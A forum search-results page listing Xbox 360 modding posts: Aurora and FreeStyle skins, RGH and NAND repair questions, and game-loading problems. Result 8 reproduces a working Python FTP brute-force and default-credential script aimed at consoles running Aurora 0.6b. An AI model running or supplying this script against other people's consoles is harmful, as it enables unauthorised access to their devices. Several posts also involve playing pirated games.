Jump to content
RealModScene

Search the Community

Showing results for tags 'XBox360'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Site News
    • Scene News
  • Phoenix
    • Aurora releases
    • Aurora support
    • Aurora Localization
    • Skins, Coverflow Layouts, Scripts and Trainers
    • Skin development and LUA scripting
    • Unity Support
    • Requests and Suggestions
  • FreeStyle Dashboard / F3
    • News
    • FreeStyle Dashboard Releases
    • Support
    • Skins
    • Skin Dev
  • Xbox
    • Tutorials
    • Homebrew
    • LibXenon
    • Games
    • Software
    • Other topics
  • PlayStation
    • Tutorials
    • Homebrew
    • Games
    • Software
    • Other Topics
  • Matchmaking
    • North America
    • Central & South America
    • Europe
    • Asia
    • Africa
    • Australia
    • Modded Lobbies
  • MarketPlace
    • Buy
    • Sell
  • Miscellaneous
    • Feedback
    • Other Topics
    • LiNK News

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 70 results

  1. The Dream Theme v2.5 (Released October 13th, 2013) What's in this Skin? - 212 HD backgrounds - 100 different stages - 15 different content tabs - 15 different icon sets - 26 Coverflow layouts Changes since v2.4: - Added 62 new HD backgrounds - Changed the coverflow look for people who want to use the status bar - Some minor Tweaks How to use: 1- Go with a ftp program to your Freestyle 3 folder 2- Place "The Dream Theme v2.5.xzp" file in your "Skins" folder. 3- Go with Freestyle 3 to the Skin menu and choose "The Dream Theme v2.5" skin. 4- Restart your Xbox360 5- Go to settings menu and select "reset skin settings" That's all Don't forget to reset your skin settings before using this new version otherwise things will not work properly! Some screenshots below The Dream Theme v2.5.rar
  2. Hi Everone. I have a slim trinity rghed xbox360. I got a corrupt nand and saw a thread explaining how to fix if i don't have the cpu key and the original nand which i do not have actually. I have cr3 lite already installed. All is good except for that i don't know how to install jr programmer v2 which i have ordered now. Do i connect with cr3 lite or solder it and if soldering is the case where to? I have no clue what these things are how they work and i would be just followimg everything step by step what is said in that forum but it doesn't really explain how to setup jr programmer v2. This is the forum I'm talking about: Few couple of things bothering me. 1)My j runner shows an error saying connection error is it because i have window 10 and how to fix it. 2) which dashboard number should i keep i read above 14719 is fine but it wasn't specific on which one to keep . 3) is glitch 2 and rgh 2 the same thing?
  3. Hi I have Corona 4G XBOX360 which i need to update. I dumped my NAND with 360 simple launcher and its size is 49.1MB I extracted my CPU key with Dashlaunch. when I run XEbuild 2.098 I'm following the tutorial per step 4 but the program refuses to generate the file, see pictures detailing my input data and the error message: I'm at loss on how to proceed. any help will be appreciated?
  4. Can someone give me TU 53 for Minecraft Xbox360? Preferably a MEGASync download, but any download will do! Thanks!
  5. I use aurora dashboard on xbox 360 to play games Today I tried to install a game, copied it to the xbox's hard drive and tried to run it. When I ran it it was just a black screen. after that I force restarted the xbox, it froze at the white startup screen (The one with ,,Xbox 360" in the middle) After a few restarts it finally went trough, but it didn't launch into aurora and I can't find how to boot it up... Can someone please help me?
  6. RGH with hard drive and menus paid it comes with 4 controllers a HDMI, power brick, console, leds with remote and play and charge kit plus mic comes with lifetime on different servers message me for more proof and details
  7. So i got a slim E series (corona v6) with a ace v3 installed. Problem is it takes forever to boot sometimes, its very incosistent, sometimes its insta boots, sometimes boots within 3-5 cycles but most of the times it takes between 10-15 cycles before it boots. So i did some research and found that i could tune it with some capacitors for a better and more consistent boot ( i already trimmed the wires but that didnt improve boot times) So the caps i bought are ceramic 10uf 50v. Is it ok to use a cap with such a high voltage, if not what rating caps would u guys recommend. Also my 360 has the winbond 2kb ram, heard 360 with them are problematic to glitch, could this contribute to the inconsistent boots? Link to caps i bought: https://m.ebay.com/itm/20Pcs-Lot-50V-475-335-106-225-Monolithic-Ceramic-Chip-Capacitor-5-08mm/192156148520?_mwBanner=1&ul_ref=https%3A%2F%2Frover.ebay.com%2Frover%2F0%2F0%2F0%3Fmpre%3Dhttps%3A%2F%2Fwww.ebay.com%2Fulk%2Fitm%2F192156148520%26rvr_id%3D0%26rvr_ts%3Dc7adcac11630aad325468656fff9c2fc&ul_noapp=true
  8. # Exploit Title: XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce # Date: 20/12/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: http://phoenix.xboxunity.net/#/news # Tested on: XBOX 360 # GREETZ: Iker Legorreta, #RemoteExecution Team #!/usr/bin/env python # -*- coding:utf-8 -*- __author__ = 'Daniel Godoy' import argparse import sys from ftplib import FTP info = ''' XBOX 360 Aurora 0.6b Default Credentials / FTP BruteForce\n Usage: ./xbox_ftp_brute_forcer.py [options]\n Options: -t, --target <hostname/ip> | Target\n -u, --user <user> | User\n -w, --wordlist <filename> | Wordlist\n -h, --help <help> | print help\n Example: ./xbox_ftp_brute_forcer.py -t 192.168.1.1 -u root -w /root/Desktop/wordlist.txt ''' def help(): print info sys.exit(0) def check_default_login(target): try: ftp = FTP(target) ftp.login('xboxftp', 'xboxftp') ftp.quit() print "\n[+] Default login is open." print "\n[+] Username : xboxftp" print "\n[+] Password : xboxftp\n" ftp.quit() except: pass def ftp_login(target, username, password): try: ftp = FTP(target) ftp.login(username, password) ftp.quit() print "\n[*] Credentials have found." print "\n[*] Username : {}".format(username) print "\n[*] Password : {}".format(password) return True except: return False def brute_force(target, username, wordlist): try: wordlist = open(wordlist, "r") words = wordlist.readlines() for word in words: word = word.strip() if ftp_login(target, username, word): break except: print "\n[-] There is no such wordlist file. \n" sys.exit(0) parser = argparse.ArgumentParser() parser.add_argument("-t", "--target") parser.add_argument("-u", "--username") parser.add_argument("-w", "--wordlist") args = parser.parse_args() if not args.target or not args.username or not args.wordlist: help() sys.exit(0) target = args.target username = args.username wordlist = args.wordlist brute_force(target, username, wordlist) check_default_login(target) print "\n[-] Brute force finished. \n" a simple code that allows attacking teams that have FTP enabled with the default password. the console must have aurora 0.6b installed and have ftp enabled
  9. Hello guys, I'm trying to upgrade my Xbox 360 (Corona v2 4GB) to the latest kernel 175711 in order to apply M$ avatar updates. But everytime I try to upgrade from my current version 16547 it flashes ok, but the version stays the same. I thought it was because I had a very old version of kernel, so I first tried to upgrade to 16767 but even this one did not work. Please find attached some images of my XeBuild config and my updflash.bin. The tutorial I tried to follow is this one: http://forum.homebrew-connection.org/index.php?topic=144.0 updflash.bin Thanks in advance you all! Glitch/Nand Reader Product(s) used: Simple_360_NAND_Flasher_v1.2Console Type: Corona V2 4GNAND size: 4GBDashboard version: 2.0.16547.0CB version: Screenshot of NAND details from J-Runner/Xebuild GUI:(attach an image to your post)J-Runner/Xebuild Gui log:updflash.bin log (if applicable): in attachmentDescription of problem: I try to upgrade the kernel version, the kernel version stays the same.updflash.binWas the console working before you started: Y updflash.bin xeBuild_GUI.log
  10. ? Hey guys.. What a bad day. My previous 360 Phat (Fffffalcon board) bummed out on my, so I bought another working board for a few bucks. After I removed the complete R-JTAG with all QSB's and reinstalled it into the new Jasper board, I couldn't get it to glitch (POST79 LOAD_XAM each time although XELL should not get to 79). Some time later I decided to wire the AUD_CLAMP manually using the 2 x 1N4148 diodes and an optional resistor method, as the little QSB suffer previous damage. As soon as I did that I started getting RRODs each time I try to boot XELL. I triple check everything and found that I accidentally soldered the AUD_CLAMP wire to Q2N3 instead of Q2N1 ? Do you guys think I fried it? Gettin 0022 RROD with each try AND with the whole R-JTAG disconnected ?☹️? EDIT: Error 0022 not 0010 sorry
  11. Sorry if this question has already been answered... was too lazy to run a search. I was able to get COD blackops 3 iso tried converting it with exisco but for some reason it didn't work. Is there any other way to convert iso to jtag format?
  12. Hello there, I'm new to this community, so I thought this section will be the best to ask for help. Sorry if I'm wrong. So lets start, I have a black xbox 360, which was made in 2012 - 09. I got it cracked so I could play any game I want, it worked fine. But few days I ago I decided to try and install either nba 2k16 or nba 2k17, I installed it, but when I wanted to play it, didn't work. An error occurred: "the game couldn't start, try downloading the game". I searched up the net, and few suggested to update the FSD3, which I already did, but it didin't help. So basically, I'm playing games from my xbox 360 250gb hdd, I've got there installed like: UFC, gta v, wwe 2013 and so on. All of these games works fine, but they got installed by me few years back. Neither of NBA worked for me, what could be the case? I have xexmenu 1.1, never updated kernel(dont know even what that is), FSD3 up to date, I use iso2god to convert straight to usb and then put the game in to the xbox from the usb. Thanks in advance, I hope I explained everything as clearly as possible.
  13. hi guys now let's cut to the chase a while ago i had a cutscene stutter in any game posted a topic a bout it swizzy told me to do some things including change my HDD as a last resort but i can't buy a new one right now so did what he told me to blow the dust from the fan and stuff and it worked no more stuttering cutscenes but 3 days ago i downloaded minecraft story mode first time worked fine but second time it began to stutter and so is devil may cry i have the HD collection finished first 2 fine when i started playing the third it began to stutter in cutscenes im attaching a video from the stuttering in minecraft it's just the title screen but it's affecting the game too im talking alot but i need to know the bottom of this ok last thing all this stuttering began a while after i modified my gamer profile so i can put avatar items in as you can see from the photo after modifying it the XboxLive word showed up there i added a 1000 or more avatar items it slowed up the console and crashed a couple of times so deleted them but my GP still modified and the console still laggy and the game stuttery and as you can see from the other photo the console TEMP is okay so the stupid question i always ask what can i do to fix it BTW im using aurora and FSD blugin for system link which i don't use it at all
  14. good night i want to know how i can connect mi pc with mi xbox 360 with aurora for to se mi files in my console i know with fsd i can with samba but with aurora i dont know how so if someone could give me a tutorial thanks
  15. Hello guys! I have an xbox360 FAT Jasper with RGH and Aurora 0.5b DB. My console have no wifi (because it's FAT) and the back USB and Internet RJ45 is broken and it came out. I can't open console and solder it. I have hmm about 15 games with no covers. In FSD3 i had the same problem. My question is: Can I manually put the PNG or JPG covers form PC (USB stick) to any folder in Aurora's data? I haven't got friend with xbox360 so i can't copy a data file and i can't use FTP. I know about a wifi to USB adapter but it's too expensive for me PS. Sorry for my bad English
  16. I ve tried everything i have found on internet regarding to put my Xbox Online on System LiNK :'( Now i have Aurora Pheonix i need your help guys still my System LiNK is greyed out at every game. For the test of System LiNK, Everything is passed except UPNP router detection which i thnk not a big Deal Need your help guys Your response will be highly appreciated. Thanks in Advance btw P.S Sorry for my bad english i guess
  17. I just bought a xbox360 With FSD 2.2 (I thínk) and ran into som problems... Downloaded some new games and didn't see them in the "360 games"-menu, so I got in to the settings and found out that I'll have ro rescan before the new games will show up. At the same time I unchecked the Box "don't scan on startup" (can't remember exactly what it said) and thought that's a good idea to make the Xbox scan everytime it started.. but not. From now on it freezes and I can't undo this setting. It starts normally but just after it's finishes and the menys shws up, it freezes. Anyone tha's been having the same issue? is it possible to undo this? //joQue
  18. Skin based on a compilation of images of Mass Effect mass effect metal music and animation background size approx 50mb aurora supports version 0.5 Skin.xzp place the file in the following path: / HDD1 / Aurora / Skins Layouts includes a custom file so that the covers look smaller and you can enjoy the best aspects of skin that you can see on the 3rd picture of the post. path: / HDD1 / Aurora / Media / Layouts MassEffectSkin.rar
  19. Hello, I have a cracked Xbox 360 with Aurora 0.3. The Aurora was installed over freestyle 3. When I download games, in which directory to copy the files to ? Guy
  20. Hi guys !! i haave a problem with this game !! everthing it's okey : my msg problem is ........ :( what i will do ?
  21. Hi Guys Wssp !! How i can extarcting gta san andreas files on my usb bcz I can not find "default.xex" what i will do ? can u help me guys ♥
  22. hi, i have a problem on my xbox360, when i inserted dvd into my xbox, its only read as xbox360 dvd, i couldn't extract the game content whether using fsd or xexmenu. i only managed to play the game by extracting it using xbox image browser on pc, and transfer to my external hdd for my xbox. my xbox using Corona motherboard, Freeboot RGH 2.0 and have been updated to latest dashboard. plz help i ve attach the setting that i use during my last dashboard update using xebuild gui
  23. Skin -X.One- [AURORA 0.4B] Hi i was update my skin (color based in Xbox One, all menu images changed for my own) Skim.Meta updated. This Skin is Based in Paradise of Mattelta. Enjoy it X-One.xzp
  24. I just downloaded Samurai Showdown Sen for my xbox like for a whole 2 days. Then, when I viewed it, it contained only 1 xex file, But then, when I tried to extract it, it told me to put in the password first to complete the process. I used winrar btw. I opened the Readme.txt file, which the torrent of that game also included and it said there that I had to go either of this whatever sites and get the password, which is obviously a virus that they made. So now im clueless on how to unlock this one. I tried that one app which uses brute force to crack the pass but didnt work. do you guys happen to know how to solve this?? Pleasee!!!!
  25. hi i use the website xboxunity for the covers and i use sign in to my acount in xboxunity and in my xbox360 console (i dont know why but every time i sign in to the unity acount in my console and go back to my game and go back again to the sign in it sign out... ) and another thing i dont know wahy but i push on the button "push to xbox" and than refrash artwork on my xbox and it does'nt do nothing so what can i do? it says that it moved to my Q (i dont know that is that Q that they are talking about and also where is it..) so thanks in against to the helpers saar
×
×
  • Create New...